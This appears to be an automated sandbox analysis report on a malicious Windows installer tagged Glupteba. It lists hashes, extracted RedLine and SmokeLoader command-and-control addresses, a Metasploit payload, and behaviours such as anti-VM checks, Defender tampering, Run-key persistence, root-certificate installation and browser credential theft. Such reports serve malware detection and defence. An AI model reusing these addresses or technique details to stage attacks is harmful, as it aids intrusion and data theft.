glupteba | 1cd649ea4273fd977b6a350bfe8f3b62f1d0aee1408b9966aa3d6ad39ba5af6a

Target

Setup (18).exe
Size

631KB
MD5

cb927513ff8ebff4dd52a47f7e42f934
SHA1

0de47c02a8adc4940a6c18621b4e4a619641d029
SHA256

fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
SHA512

988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

redline

Botnet

Second_7.5K

45.14.49.200:27625

Extracted

Family

redline

Botnet

www

185.204.109.146:54891

Extracted

Family

redline

Botnet

dibild

135.148.139.222:33569

Extracted

Family

redline

Botnet

19.08

95.181.172.100:6795

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 2 IoCs

Processes:

resource	yara_rule
behavioral20/memory/2716-363-0x00000000048D0000-0x00000000051F6000-memory.dmp	family_glupteba
behavioral20/memory/2716-378-0x0000000000400000-0x00000000027DB000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerundll32.exerundll32.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6188	3884	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7676	3884	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	9120	3884	rundll32.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 11 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Documents\wD5NwThcOmu4o3xMhUXyWYit.exe	family_redline
C:\Users\Admin\Documents\yoodz44Yg0ljcCtGfnfw3ZlY.exe	family_redline
C:\Users\Admin\Documents\wD5NwThcOmu4o3xMhUXyWYit.exe	family_redline
C:\Users\Admin\Documents\yoodz44Yg0ljcCtGfnfw3ZlY.exe	family_redline
behavioral20/memory/4904-283-0x000000000041905A-mapping.dmp	family_redline
behavioral20/memory/1648-294-0x00000000024B0000-0x00000000025FA000-memory.dmp	family_redline
behavioral20/memory/5028-310-0x0000000000418F7A-mapping.dmp	family_redline
behavioral20/memory/4920-284-0x0000000000418E52-mapping.dmp	family_redline
behavioral20/memory/4920-279-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral20/memory/4904-276-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral20/memory/4920-332-0x00000000055E0000-0x0000000005BE6000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Nirsoft 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\11111.exe	Nirsoft

Downloads MZ/PE file

Executes dropped EXE 41 IoCs

Processes:

Vmn4PVGj0R18eRXqQIBemdUg.exewD5NwThcOmu4o3xMhUXyWYit.exeyoodz44Yg0ljcCtGfnfw3ZlY.exe7D32Le47Ps_lp5bMpkU5RnGM.exeq3k71AT3BZDEsXUrePQAIsLS.exebZJT82MkAWZQQp7_JaeQ1dSF.exeAVqk1UPoSsbAvzi4L5Kuu6bC.exeH99IIYBCp415OLNLtdHnTFmS.exeOswiwDLy8o9Ia_NYRV9VXqA9.exeMjT1m_JgjTVfbcEbgFdw8igH.exe0caebW5jEXToU5eC3PMuq4f0.exeDBYWgFzqSyRnTC2xtVxdSZPJ.exehqxa5Mo59Wmnvff3zAY0Aghd.exeQHgwKa28V7P5sqyE2Sl0_hFF.exeD15mnp9yV3DSru0qxTrTPLC5.exeMIcIvpI4I70jogh_7GmzX0Re.exe4yugMo4I2yJgvw_Kg9av9OCT.exe1QzI74oJk44h5pnSKCFUFrND.exe4TS5KEf_GCWhHvczBXfd5Urj.exejooyu.exemd8_8eus.execustomer3.exe4TS5KEf_GCWhHvczBXfd5Urj.tmphqxa5Mo59Wmnvff3zAY0Aghd.exeAVqk1UPoSsbAvzi4L5Kuu6bC.exeOswiwDLy8o9Ia_NYRV9VXqA9.exeMjT1m_JgjTVfbcEbgFdw8igH.exejfiag3g_gg.exeAVqk1UPoSsbAvzi4L5Kuu6bC.exe2329176.exeInlog.tmp11111.exeSetup.exeWinHoster.exe11111.execmd.exeInlog.exeCleaner Installation.exesvchost.exeVPN.exemd7_7dfj.exe

pid	process
1264	Vmn4PVGj0R18eRXqQIBemdUg.exe
1244	wD5NwThcOmu4o3xMhUXyWYit.exe
3940	yoodz44Yg0ljcCtGfnfw3ZlY.exe
1816	7D32Le47Ps_lp5bMpkU5RnGM.exe
1280	q3k71AT3BZDEsXUrePQAIsLS.exe
2724	bZJT82MkAWZQQp7_JaeQ1dSF.exe
1408	AVqk1UPoSsbAvzi4L5Kuu6bC.exe
2716	H99IIYBCp415OLNLtdHnTFmS.exe
3944	OswiwDLy8o9Ia_NYRV9VXqA9.exe
2400	MjT1m_JgjTVfbcEbgFdw8igH.exe
2452	0caebW5jEXToU5eC3PMuq4f0.exe
2164	DBYWgFzqSyRnTC2xtVxdSZPJ.exe
3108	hqxa5Mo59Wmnvff3zAY0Aghd.exe
1648	QHgwKa28V7P5sqyE2Sl0_hFF.exe
192	D15mnp9yV3DSru0qxTrTPLC5.exe
196	MIcIvpI4I70jogh_7GmzX0Re.exe
2392	4yugMo4I2yJgvw_Kg9av9OCT.exe
1712	1QzI74oJk44h5pnSKCFUFrND.exe
4292	4TS5KEf_GCWhHvczBXfd5Urj.exe
4352	jooyu.exe
4376	md8_8eus.exe
4416	customer3.exe
4536	4TS5KEf_GCWhHvczBXfd5Urj.tmp
4712	hqxa5Mo59Wmnvff3zAY0Aghd.exe
4884	AVqk1UPoSsbAvzi4L5Kuu6bC.exe
4904	OswiwDLy8o9Ia_NYRV9VXqA9.exe
4920	MjT1m_JgjTVfbcEbgFdw8igH.exe
4248	jfiag3g_gg.exe
5028	AVqk1UPoSsbAvzi4L5Kuu6bC.exe
3176	2329176.exe
2104	Inlog.tmp
2436	11111.exe
3476	Setup.exe
4368	WinHoster.exe
4332	11111.exe
2216	cmd.exe
2484	Inlog.exe
3240	Cleaner Installation.exe
3340	svchost.exe
2300	VPN.exe
1960	md7_7dfj.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

MIcIvpI4I70jogh_7GmzX0Re.exeq3k71AT3BZDEsXUrePQAIsLS.exebZJT82MkAWZQQp7_JaeQ1dSF.exe1QzI74oJk44h5pnSKCFUFrND.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	MIcIvpI4I70jogh_7GmzX0Re.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	q3k71AT3BZDEsXUrePQAIsLS.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	q3k71AT3BZDEsXUrePQAIsLS.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	bZJT82MkAWZQQp7_JaeQ1dSF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	bZJT82MkAWZQQp7_JaeQ1dSF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1QzI74oJk44h5pnSKCFUFrND.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1QzI74oJk44h5pnSKCFUFrND.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	MIcIvpI4I70jogh_7GmzX0Re.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Setup (18).exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	Setup (18).exe

Loads dropped DLL 2 IoCs

Processes:

4TS5KEf_GCWhHvczBXfd5Urj.tmp

pid process

4536 4TS5KEf_GCWhHvczBXfd5Urj.tmp
4536 4TS5KEf_GCWhHvczBXfd5Urj.tmp
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
4536	4TS5KEf_GCWhHvczBXfd5Urj.tmp
4536	4TS5KEf_GCWhHvczBXfd5Urj.tmp

Themida packer 12 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\Documents\q3k71AT3BZDEsXUrePQAIsLS.exe	themida
C:\Users\Admin\Documents\bZJT82MkAWZQQp7_JaeQ1dSF.exe	themida
C:\Users\Admin\Documents\1QzI74oJk44h5pnSKCFUFrND.exe	themida
C:\Users\Admin\Documents\bZJT82MkAWZQQp7_JaeQ1dSF.exe	themida
C:\Users\Admin\Documents\MIcIvpI4I70jogh_7GmzX0Re.exe	themida
C:\Users\Admin\Documents\MIcIvpI4I70jogh_7GmzX0Re.exe	themida
C:\Users\Admin\Documents\1QzI74oJk44h5pnSKCFUFrND.exe	themida
C:\Users\Admin\Documents\q3k71AT3BZDEsXUrePQAIsLS.exe	themida
behavioral20/memory/1712-226-0x0000000000380000-0x0000000000381000-memory.dmp	themida
behavioral20/memory/196-239-0x0000000000C40000-0x0000000000C41000-memory.dmp	themida
behavioral20/memory/1280-256-0x0000000000090000-0x0000000000091000-memory.dmp	themida
behavioral20/memory/2724-266-0x0000000000EF0000-0x0000000000EF1000-memory.dmp	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Inlog.tmp

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	Inlog.tmp

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

1QzI74oJk44h5pnSKCFUFrND.exeq3k71AT3BZDEsXUrePQAIsLS.exeMIcIvpI4I70jogh_7GmzX0Re.exebZJT82MkAWZQQp7_JaeQ1dSF.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	1QzI74oJk44h5pnSKCFUFrND.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	q3k71AT3BZDEsXUrePQAIsLS.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	MIcIvpI4I70jogh_7GmzX0Re.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	bZJT82MkAWZQQp7_JaeQ1dSF.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 15 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
356	ipinfo.io
31	ipinfo.io
134	ipinfo.io
352	ipinfo.io
131	ipinfo.io
205	ipinfo.io
367	ip-api.com
32	ipinfo.io
124	ip-api.com
325	ipinfo.io
204	ipinfo.io
344	ipinfo.io
182	ipinfo.io
186	ipinfo.io
201	ipinfo.io

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

MIcIvpI4I70jogh_7GmzX0Re.exeq3k71AT3BZDEsXUrePQAIsLS.exe1QzI74oJk44h5pnSKCFUFrND.exebZJT82MkAWZQQp7_JaeQ1dSF.exe

pid process

196 MIcIvpI4I70jogh_7GmzX0Re.exe
1280 q3k71AT3BZDEsXUrePQAIsLS.exe
1712 1QzI74oJk44h5pnSKCFUFrND.exe
2724 bZJT82MkAWZQQp7_JaeQ1dSF.exe

pid	process
196	MIcIvpI4I70jogh_7GmzX0Re.exe
1280	q3k71AT3BZDEsXUrePQAIsLS.exe
1712	1QzI74oJk44h5pnSKCFUFrND.exe
2724	bZJT82MkAWZQQp7_JaeQ1dSF.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

OswiwDLy8o9Ia_NYRV9VXqA9.exeMjT1m_JgjTVfbcEbgFdw8igH.exeAVqk1UPoSsbAvzi4L5Kuu6bC.exe

description	pid	process	target process
PID 3944 set thread context of 4904	3944	OswiwDLy8o9Ia_NYRV9VXqA9.exe	OswiwDLy8o9Ia_NYRV9VXqA9.exe
PID 2400 set thread context of 4920	2400	MjT1m_JgjTVfbcEbgFdw8igH.exe	MjT1m_JgjTVfbcEbgFdw8igH.exe
PID 1408 set thread context of 5028	1408	AVqk1UPoSsbAvzi4L5Kuu6bC.exe	AVqk1UPoSsbAvzi4L5Kuu6bC.exe

Drops file in Program Files directory 20 IoCs

Processes:

DBYWgFzqSyRnTC2xtVxdSZPJ.exeSetup.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Company\NewProduct\customer3.exe	DBYWgFzqSyRnTC2xtVxdSZPJ.exe
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	DBYWgFzqSyRnTC2xtVxdSZPJ.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\jooyu.exe	DBYWgFzqSyRnTC2xtVxdSZPJ.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	DBYWgFzqSyRnTC2xtVxdSZPJ.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe	Setup.exe
File created	C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe	DBYWgFzqSyRnTC2xtVxdSZPJ.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe	Setup.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 37 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2120	1648	WerFault.exe	QHgwKa28V7P5sqyE2Sl0_hFF.exe
4408	1648	WerFault.exe	QHgwKa28V7P5sqyE2Sl0_hFF.exe
4564	1648	WerFault.exe	QHgwKa28V7P5sqyE2Sl0_hFF.exe
3576	1648	WerFault.exe	QHgwKa28V7P5sqyE2Sl0_hFF.exe
4572	4416	WerFault.exe	customer3.exe
5628	1648	WerFault.exe	QHgwKa28V7P5sqyE2Sl0_hFF.exe
5676	1648	WerFault.exe	QHgwKa28V7P5sqyE2Sl0_hFF.exe
6024	192	WerFault.exe	D15mnp9yV3DSru0qxTrTPLC5.exe
6104	1648	WerFault.exe	QHgwKa28V7P5sqyE2Sl0_hFF.exe
5780	192	WerFault.exe	D15mnp9yV3DSru0qxTrTPLC5.exe
6008	192	WerFault.exe	D15mnp9yV3DSru0qxTrTPLC5.exe
6536	192	WerFault.exe	D15mnp9yV3DSru0qxTrTPLC5.exe
1836	192	WerFault.exe	D15mnp9yV3DSru0qxTrTPLC5.exe
6264	5532	WerFault.exe	svchost.exe
6376	192	WerFault.exe	D15mnp9yV3DSru0qxTrTPLC5.exe
5572	6492	WerFault.exe	OqvuInXq4AUg4mm4fRIR7jTs.exe
4064	192	WerFault.exe	D15mnp9yV3DSru0qxTrTPLC5.exe
2660	2216	WerFault.exe	LGCH2-401_2021-08-18_14-40.exe
4760	6492	WerFault.exe	OqvuInXq4AUg4mm4fRIR7jTs.exe
1784	2216	WerFault.exe	LGCH2-401_2021-08-18_14-40.exe
3744	6492	WerFault.exe	OqvuInXq4AUg4mm4fRIR7jTs.exe
5112	2216	WerFault.exe	LGCH2-401_2021-08-18_14-40.exe
5128	6492	WerFault.exe	OqvuInXq4AUg4mm4fRIR7jTs.exe
2656	6492	WerFault.exe	OqvuInXq4AUg4mm4fRIR7jTs.exe
6244	6492	WerFault.exe	OqvuInXq4AUg4mm4fRIR7jTs.exe
5404	2216	WerFault.exe	LGCH2-401_2021-08-18_14-40.exe
4180	2216	WerFault.exe	LGCH2-401_2021-08-18_14-40.exe
4180	2216	WerFault.exe	LGCH2-401_2021-08-18_14-40.exe
7660	6516	WerFault.exe	OYyz1M6bnpnDeCLMR7qNJUcO.exe
7852	6516	WerFault.exe	OYyz1M6bnpnDeCLMR7qNJUcO.exe
8080	6516	WerFault.exe	OYyz1M6bnpnDeCLMR7qNJUcO.exe
7300	6516	WerFault.exe	OYyz1M6bnpnDeCLMR7qNJUcO.exe
7524	6516	WerFault.exe	OYyz1M6bnpnDeCLMR7qNJUcO.exe
6100	6516	WerFault.exe	OYyz1M6bnpnDeCLMR7qNJUcO.exe
7932	6516	WerFault.exe	OYyz1M6bnpnDeCLMR7qNJUcO.exe
6276	6516	WerFault.exe	OYyz1M6bnpnDeCLMR7qNJUcO.exe
8144	6516	WerFault.exe	OYyz1M6bnpnDeCLMR7qNJUcO.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

Vmn4PVGj0R18eRXqQIBemdUg.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Vmn4PVGj0R18eRXqQIBemdUg.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Vmn4PVGj0R18eRXqQIBemdUg.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Vmn4PVGj0R18eRXqQIBemdUg.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

8036 schtasks.exe
7636 schtasks.exe
7308 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1764 timeout.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

5624 taskkill.exe

pid	process
8036	schtasks.exe
7636	schtasks.exe
7308	schtasks.exe

pid	process
1764	timeout.exe

pid	process
5624	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Setup (18).exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Setup (18).exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Setup (18).exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

7388 PING.EXE
5684 PING.EXE

pid	process
7388	PING.EXE
5684	PING.EXE

Script User-Agent 16 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	348	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	137	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	183	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	200	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	338	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	156	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	161	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	202	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	329	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	158	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	326	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	358	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	133	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	134	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	152	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	167	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Setup (18).exeVmn4PVGj0R18eRXqQIBemdUg.exeWerFault.exe

pid	process
3228	Setup (18).exe
3228	Setup (18).exe
1264	Vmn4PVGj0R18eRXqQIBemdUg.exe
1264	Vmn4PVGj0R18eRXqQIBemdUg.exe
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2120	WerFault.exe
2120	WerFault.exe
2120	WerFault.exe
2120	WerFault.exe
2120	WerFault.exe
2120	WerFault.exe
2120	WerFault.exe
2120	WerFault.exe
2120	WerFault.exe
2120	WerFault.exe
2120	WerFault.exe
2120	WerFault.exe
2120	WerFault.exe
2832
2832
2120	WerFault.exe
2120	WerFault.exe
2120	WerFault.exe
2120	WerFault.exe
2120	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2832
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

Vmn4PVGj0R18eRXqQIBemdUg.exe

pid process

1264 Vmn4PVGj0R18eRXqQIBemdUg.exe

pid	process
2832

Suspicious use of AdjustPrivilegeToken 26 IoCs

Processes:

0caebW5jEXToU5eC3PMuq4f0.exeyoodz44Yg0ljcCtGfnfw3ZlY.exewD5NwThcOmu4o3xMhUXyWYit.exeMIcIvpI4I70jogh_7GmzX0Re.exe1QzI74oJk44h5pnSKCFUFrND.exeq3k71AT3BZDEsXUrePQAIsLS.exeOswiwDLy8o9Ia_NYRV9VXqA9.exebZJT82MkAWZQQp7_JaeQ1dSF.exeWerFault.exeMjT1m_JgjTVfbcEbgFdw8igH.exeAVqk1UPoSsbAvzi4L5Kuu6bC.exe2329176.exeWerFault.exeWerFault.exe

description	pid	process
Token: SeDebugPrivilege	2452	0caebW5jEXToU5eC3PMuq4f0.exe
Token: SeDebugPrivilege	3940	yoodz44Yg0ljcCtGfnfw3ZlY.exe
Token: SeDebugPrivilege	1244	wD5NwThcOmu4o3xMhUXyWYit.exe
Token: SeDebugPrivilege	196	MIcIvpI4I70jogh_7GmzX0Re.exe
Token: SeDebugPrivilege	1712	1QzI74oJk44h5pnSKCFUFrND.exe
Token: SeDebugPrivilege	1280	q3k71AT3BZDEsXUrePQAIsLS.exe
Token: SeDebugPrivilege	4904	OswiwDLy8o9Ia_NYRV9VXqA9.exe
Token: SeShutdownPrivilege	2832
Token: SeCreatePagefilePrivilege	2832
Token: SeShutdownPrivilege	2832
Token: SeCreatePagefilePrivilege	2832
Token: SeDebugPrivilege	2724	bZJT82MkAWZQQp7_JaeQ1dSF.exe
Token: SeRestorePrivilege	2120	WerFault.exe
Token: SeBackupPrivilege	2120	WerFault.exe
Token: SeDebugPrivilege	4920	MjT1m_JgjTVfbcEbgFdw8igH.exe
